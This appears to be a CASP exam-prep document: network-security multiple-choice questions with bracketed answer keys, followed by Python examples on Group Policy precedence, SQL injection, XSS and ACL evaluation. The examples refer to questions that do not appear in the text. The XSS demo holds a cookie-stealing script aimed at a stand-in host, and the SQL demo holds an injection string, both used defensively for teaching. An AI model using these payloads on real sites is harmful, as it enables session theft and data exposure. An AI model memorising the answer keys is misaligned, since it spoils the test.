[C] What DMZ topology is displayed? Choose the best response. (See page 393 for the image.) A. Bastion host B. Dual firewall C. Three-homed firewall D. UTM firewall

[B,E] You've been using a dual stack configuration to transition the network to IPv6, but constantly changing IPv6 addresses are making it hard to manage devices, and IPv6 connectivity is sometimes inconsistent between hosts you know support it. What changes might improve the situation? Choose all that apply. A. Blocking IPv6 multicast traffic B. Disabling IPv6 privacy extensions on hosts C. Disabling SEND D. Enabling IPv6 privacy extensions on hosts E. Ensuring all routers support IPv6

[C] You're receiving a lot of unauthorized network scans using methods carefully designed to get by existing firewall rules. What device or feature would be the best way to recognize and block those scans? Choose the best response. A. Application layer firewall B. IDS C. IPS D. Stateful firewall

[C] You want to take some proactive actions against a new family of malware that's been spreading around. It has spyware and botnet functions, and infected computers connect to external servers. You have a list of the domain names the malware contacts. What security tool would help you to recognize that malware on your network? A. Honeypot B. IDS C. Sinkhole D. WAF

[A] Management is concerned by the potential of sensitive data leaking from employee workstations to outside networks, and you've been tasked with choosing network security controls to detect and prevent it.
The employee LAN is already separated from the internet by a firewall and proxy server, so what is the next control you should add? Choose the best response. A. DLP on the network gateway B. Inline IPS C. Network-based DAM D. Proxy-based DAM

[C] Your company is about to deploy a server application, and is using load balancing to cope with expected high volumes. To help protect the server from outside attack, you've been instructed to add additional security features to the load balancing solution, such as a WAF and proxy server. What kind of proxy configuration should you be researching? Choose the best solution. A. Anonymous proxy B. Forward proxy C. Reverse proxy D. Transparent proxy

[C,E] You've recently installed an advanced UTM firewall at the network perimeter, with additional firewalls and IDS between security zones, but apart from host-based firewalls and antivirus there isn't much protection within a zone. What actions might help improve detection of an inside threat? Choose all that apply. A. Deploying a honeynet B. Installing a content switch with health checking C. Installing agent-based DAM on a DBMS D. Placing a transparent proxy at the network boundary E. Placing HIDS on individual hosts

[C] You're evaluating NAC solutions. One feature you need is to make sure that when sales users join the network remotely they'll automatically be joined to the Sales network and given access to its resources. What kind of solution should you look for? Choose the best response. A. Agentless B. Location-based C. Role-based D. Rule-based

[B] You're helping to evaluate a NAC system for remote access to a high security network. Client systems should have their security postures monitored at all times, even when not connected to the network. When they are connected, each request to the network will be evaluated to make sure it conforms with network policies. What kind of solution would meet these needs? A. Inline and agentless NAC B. Inline NAC with a persistent agent C.
Out-of-band NAC with a dissolvable agent D. Out-of-band NAC with a persistent agent

[A] You have a lingering problem with mobile users who connect to untrusted Wi-Fi networks without enabling their VPN, out of forgetfulness or lack of technical knowledge. What technology might help solve the problem? Choose the best response. A. Always-on VPN B. ESP C. Full tunneling D. Secure shell

[A] Your organization has a BYOD policy for laptops and mobile devices used for remote access. Management wants a standardized VPN technology that has strong security and broad application compatibility. Since they don't want to support additional third-party applications on user devices, it also needs to be natively supported by all popular operating systems. What type of VPN can you recommend? A. L2TP/IPsec B. PPTP C. SSH D. SSL/TLS

[A,C,E] You're replacing an old VPN solution with a new one and examining what policies and configuration options you should use. You're asked how the choice between split tunnel and full tunnel operation will affect network function and security. What answers should you give? Choose all that apply. A. Full tunnel might have a latency and throughput impact for client computers B. Full tunnel VPNs typically use weaker authentication methods C. Some regulatory requirements forbid split tunnel D. Split tunnel might increase the load on the enterprise VPN concentrator E. Split tunnel can increase the risk of data exfiltration

[A] You can use a VPN to securely encrypt all of your network communication even on an open Wi-Fi network. True or false? A. True B. False

[C] The management interface for your firewall has some known vulnerabilities, so you're worried that someone already on the network could log onto the firewall and change its settings. Which of the following methods could reduce that threat? Choose the best response. A. Deploy a sinkhole B. Switch to in-band management C. Switch to out-of-band management D.
Switch to stateful filtering

[C,E] A large office building has added Wi-Fi hotspots in individual areas over time with no centralized plan, but the network administrator wants you to determine a standard security profile for all of them with minimal hardware expenditure. You'd like it to have strong security and integrate into existing network AAA systems, but roaming and guest access aren't big priorities. At present the local administrators are capable of managing WAP configuration, provided they're all on the same page for recommended settings. What settings will you suggest for all WAPs? Choose all that apply. A. Deploy thin WAPs managed by a WLC B. Disable MAC filtering and SSID broadcast C. Enable MAC filtering to known mobile devices D. Enable WPS E. Use 802.1X mode with a RADIUS server

[A] Your secure ICS network is isolated enough to prevent any direct logins from the main corporate network, but you want to manage a device on the ICS network from your own workstation. What technology can you configure to do so? Choose the best response. A. Jump box B. Mandatory access control C. Network access control D. VLAN segmentation

[B] In a recent security incident, someone performed a switch spoofing attack to violate VLAN separation. The attacker connected to an access port on the switch and convinced it to set itself as a trunk port. What step could you take to prevent recurrence? Choose the best answer. A. Configure trunk ports to explicitly tag all traffic. B. Disable DTP and manually set all port status. C. Set a different default ID for trunk ports. D. Set all switch ports to Dynamic Auto using DTP.

[A,B,C] You're evaluating desktop sharing solutions for remote technical support. Since employees and technical support will be separated by untrusted networks, man-in-the-middle attacks are a significant security concern.
Since the users being supported will be handling PII and PHI, there are regulatory compliance issues if technical support workers view or access sensitive information on employee screens. What features does the remote assistance solution need? Choose all that apply. A. Ability for users to choose what application windows they do and do not share B. Auditing of remote access activity C. Open encryption protocols D. Presence functionality for technical support workers E. Proprietary encryption protocol

[C] Two companies plan to regularly exchange highly sensitive information using email over the internet. Each has its own email servers, but they're connected indirectly through ISP networks, and messages are likely to be forwarded through untrusted public servers along the way. What security feature would do the MOST to protect this valuable data? Choose the best response. A. Configure clients to use IMAP with TLS encryption B. Configure SPF features on each organization's email server C. Encrypt email contents with S/MIME D. Require authentication on SMTP servers

[A,D] An executive at your company wants to host a web conference involving a great deal of proprietary information, so securing access to it is important. Which of the following risks can you NOT readily reduce with technical controls? Choose all that apply. A. An attendee records the conference by pointing a smartphone at the screen. B. An attendee shares his access code with multiple friends on their own computers. C. An attendee from the last conference who isn't invited this time reuses her old access code. D. An attendee takes notes and shares them with a competitor. E. An uninvited guest intercepts an invitation and simply claims to be the actual attendee.

[B] While your existing VoIP system has some security features, you need a means to establish secure end-to-end communications with secure telephone systems at a US government facility. The solution must be compliant with applicable federal regulations.
What is the best solution for your needs? A. Apply TLS encryption to a SIP connection B. Deploy a SCIP-compliant system C. Enable 802.1q D. Enable the SRTP security profile
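The Group Policy precedence question above (five overlapping GPOs on one server) comes down to processing order: local, site, domain, OU, child OU, with the last-written setting winning. The following is an added example, not part of the original question set, that computes the precedence list and the resultant policy for a set of constructed sample GPOs. The GPO names are the five from the question; the settings, the Enforced flags and the helper names are assumptions for illustration. Enforced links are modelled as Microsoft documents them (an enforced link cannot be overridden by lower-level links, and the higher-level link wins when two enforced links conflict); Block Inheritance, security filtering, WMI filters and loopback processing are ignored.

```python
# Application order for Group Policy: Local, Site, Domain, OU, child OU (LSDOU).
# A setting written by a later GPO overrides the same setting from an earlier one.
APPLY_ORDER = [
    "Local server",
    "Site (North Central)",
    "Domain",
    "Organizational unit (Servers)",
    "Child OU (SQL)",
]

# Constructed sample GPOs (assumption, not from the question): each maps a
# setting name to a value; "enforced" marks the GPO link as Enforced.
SAMPLE_GPOS = {
    "Local server": {"settings": {"MinPasswordLength": 8, "AuditLogon": "none"}, "enforced": False},
    "Site (North Central)": {"settings": {"MinPasswordLength": 10}, "enforced": False},
    "Domain": {"settings": {"MinPasswordLength": 12, "AuditLogon": "success"}, "enforced": True},
    "Organizational unit (Servers)": {"settings": {"AuditLogon": "success,failure", "AllowRDP": True}, "enforced": False},
    "Child OU (SQL)": {"settings": {"MinPasswordLength": 14, "AllowRDP": False}, "enforced": False},
}


def precedence_list():
    """Rank 1 overrides all others: the reverse of the application order."""
    return {rank: gpo for rank, gpo in enumerate(reversed(APPLY_ORDER), start=1)}


def resultant_policy(gpos):
    """Return (effective settings, winning GPO for each setting).

    Pass 1 applies non-enforced links in LSDOU order, so a closer container
    overwrites a more distant one.  Pass 2 applies enforced links on top,
    walking from the lowest container to the highest so that the highest-level
    enforced link is written last and therefore wins any conflict.
    """
    effective, winner = {}, {}
    for gpo in APPLY_ORDER:
        if gpo in gpos and not gpos[gpo]["enforced"]:
            for key, value in gpos[gpo]["settings"].items():
                effective[key], winner[key] = value, gpo
    for gpo in reversed(APPLY_ORDER):
        if gpo in gpos and gpos[gpo]["enforced"]:
            for key, value in gpos[gpo]["settings"].items():
                effective[key], winner[key] = value, gpo
    return effective, winner


if __name__ == "__main__":
    for rank, gpo in precedence_list().items():
        print(rank, gpo)
    settings, winners = resultant_policy(SAMPLE_GPOS)
    for key in settings:
        print(f"{key} = {settings[key]!r}  (from {winners[key]})")
```

With the sample data the child OU still wins AllowRDP, but MinPasswordLength and AuditLogon come from the enforced Domain GPO even though the child OU and Servers OU set them later; that is the case the plain "1 to 5" list does not capture.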
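Two of the web application questions above (the IDS alert showing the form input 1' OR '1'='1, and the long string of digits sent to a four-digit field) are both about what happens when a server trusts a field's contents. The following is an added example, not part of the original question set, showing why that exact payload returns every row from a string-concatenated query and why a bound parameter does not, plus the server-side four-digit check that rejects the oversized input. The table, rows and function names are constructed for this illustration and use Python's standard sqlite3 module.

```python
import sqlite3

# Constructed sample table for this example (not from the page): account id,
# username and a four-digit PIN stored as text.
SAMPLE_ACCOUNTS = [(1, "alice", "4821"), (2, "bob", "9930"), (3, "carol", "1177")]

# The form input from the IDS alert in the question above.
IDS_PAYLOAD = "1' OR '1'='1"


def make_db():
    """Fresh in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, username TEXT, pin TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def lookup_vulnerable(conn, pin):
    """Builds the SQL by string concatenation.  The quote in the payload closes
    the literal and the rest runs as SQL:  ... WHERE pin = '1' OR '1'='1'."""
    sql = "SELECT username FROM accounts WHERE pin = '" + pin + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, pin):
    """Bound parameter: the driver passes the value as data, never as SQL text,
    so the payload is compared literally against the pin column and matches nothing."""
    rows = conn.execute("SELECT username FROM accounts WHERE pin = ?", (pin,))
    return [row[0] for row in rows]


def is_four_digit_pin(value):
    """Server-side allow-list check: exactly four ASCII digits.
    (str.isdigit() alone would also accept non-ASCII digit characters.)"""
    return len(value) == 4 and all(c in "0123456789" for c in value)


def lookup_hardened(conn, pin):
    """Reject anything that is not a four-digit PIN before it reaches the
    database, then still query with a bound parameter (defense in depth)."""
    if not is_four_digit_pin(pin):
        return []
    return lookup_parameterized(conn, pin)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", lookup_vulnerable(db, IDS_PAYLOAD))
    print("parameterized: ", lookup_parameterized(db, IDS_PAYLOAD))
    print("hardened:      ", lookup_hardened(db, IDS_PAYLOAD))
    print("long digits:   ", lookup_hardened(db, "4" * 5000))
```

The first call returns all three usernames; the other three return an empty list. Note that parameterization alone does not reject the 5000-digit input, it just makes it harmless to the query; length and character checks are a separate control.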
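The XSS questions above make two points: sanitizing what gets stored does not stop reflected or DOM-based XSS, and JavaScript validation in the browser is bypassed simply by not using the browser. The following is an added example, not part of the original question set, showing the request a server actually receives, a renderer that reflects it (the vulnerable case), and the server-side controls that close it: HTML output encoding at render time and an allow-list validation of the field. The query string, the template and the allow-list pattern are constructed for this illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample request (not from the page): the query string the server
# receives.  Whatever JavaScript the page's form runs, an attacker can send this
# directly with curl or an intercepting proxy, so the browser-side check never runs.
CONSTRUCTED_QUERY = ("q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F"
                     "evil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E")

TEMPLATE = "<h1>Results for: {term}</h1>"

# Hypothetical allow-list for a search term: letters, digits, space and a few
# punctuation characters, at most 64 characters.
SEARCH_TERM_RE = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def get_search_term(query_string):
    """parse_qs undoes the percent-encoding, so the raw payload comes back as text."""
    return parse_qs(query_string).get("q", [""])[0]


def render_vulnerable(term):
    """Reflects the term straight into the page: reflected XSS."""
    return TEMPLATE.format(term=term)


def render_escaped(term):
    """Encodes for the HTML context at output time, regardless of what was
    validated or stored earlier.  Nothing in the database was ever involved."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def render_hardened(term):
    """Server-side allow-list validation first, then output encoding as well."""
    if not SEARCH_TERM_RE.fullmatch(term):
        return "<h1>Invalid search term</h1>"
    return render_escaped(term)


def contains_script_tag(markup):
    """Crude check used only to show the difference between the renderers."""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    term = get_search_term(CONSTRUCTED_QUERY)
    print("decoded input: ", term)
    print("vulnerable:    ", render_vulnerable(term))
    print("escaped:       ", render_escaped(term))
    print("hardened:      ", render_hardened(term))
```

Output encoding is the control that actually neutralizes the payload; the allow-list is an extra layer that also rejects inputs the page has no business accepting. Encoding must match the context (HTML body here; attributes, URLs and JavaScript need different encoders), which is why storing "sanitized" input is not a substitute.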
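The router ACL question above (inconsistent SSH to 10.10.200.5) is answered by one rule: an ACL is evaluated top-down, the first matching entry decides, and anything that matches nothing hits the implicit deny at the end. The following is an added example, not part of the original question set, that implements that first-match evaluation and runs the five candidate ACLs against an SSH packet to the server. The rules match on protocol, destination network and destination port only, since that is all the question's rules specify (real access control entries also match source addresses and ports), and the two subnets are assumed to be /24s; the function names are constructed for this illustration.

```python
import ipaddress


def rule(action, proto=None, dst=None, port=None):
    """One access control entry.  None for a field means 'any'."""
    return {
        "action": action,
        "proto": proto,
        "dst": ipaddress.ip_network(dst) if dst else None,
        "port": port,
    }


def matches(entry, proto, dst_ip, dst_port):
    if entry["proto"] is not None and entry["proto"] != proto:
        return False
    if entry["dst"] is not None and ipaddress.ip_address(dst_ip) not in entry["dst"]:
        return False
    if entry["port"] is not None and entry["port"] != dst_port:
        return False
    return True


def evaluate(acl, proto, dst_ip, dst_port):
    """Top-down, first match wins; unmatched traffic hits the implicit deny."""
    for entry in acl:
        if matches(entry, proto, dst_ip, dst_port):
            return entry["action"]
    return "deny"


# The five candidate ACLs from the question, as constructed rule lists.
# Assumption: "the 10.10.200.0 subnet" and "the 10.5.100.0 subnet" are /24s.
CANDIDATES = {
    "A": [rule("deny", "tcp", None, 22), rule("permit", "tcp", "10.10.200.0/24", 22)],
    "B": [rule("deny", "tcp", "10.5.100.0/24", 22), rule("permit", "tcp", "10.10.200.0/24", 22)],
    "C": [rule("permit", "tcp", "10.10.200.0/24", 22), rule("deny", "tcp", None, 22)],
    "D": [rule("deny"), rule("permit", "tcp", "10.10.200.0/24", 22)],
    "E": [rule("permit", "tcp", "10.10.200.0/24", 22), rule("deny")],
}

SSH_TO_SERVER = ("tcp", "10.10.200.5", 22)


def ssh_reaches_server(acl):
    return evaluate(acl, *SSH_TO_SERVER) == "permit"


def problem_acls():
    """Labels of the candidate ACLs that block SSH to 10.10.200.5."""
    return [label for label, acl in CANDIDATES.items() if not ssh_reaches_server(acl)]


if __name__ == "__main__":
    for label, acl in CANDIDATES.items():
        print(label, "permit" if ssh_reaches_server(acl) else "deny")
    print("ACLs that break SSH:", problem_acls())
```

A and D block the traffic because the broad deny is reached before the specific permit, so the permit is dead code. B, C and E all allow it; E's trailing deny any any only makes the implicit deny explicit, which is harmless and common practice for logging hits.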
Written for: CASP 1 (institution), CASP 1 (module)
Document information: uploaded on February 16, 2023; 33 pages; written in 2022/2023; type: exam (elaborations); contains: questions & answers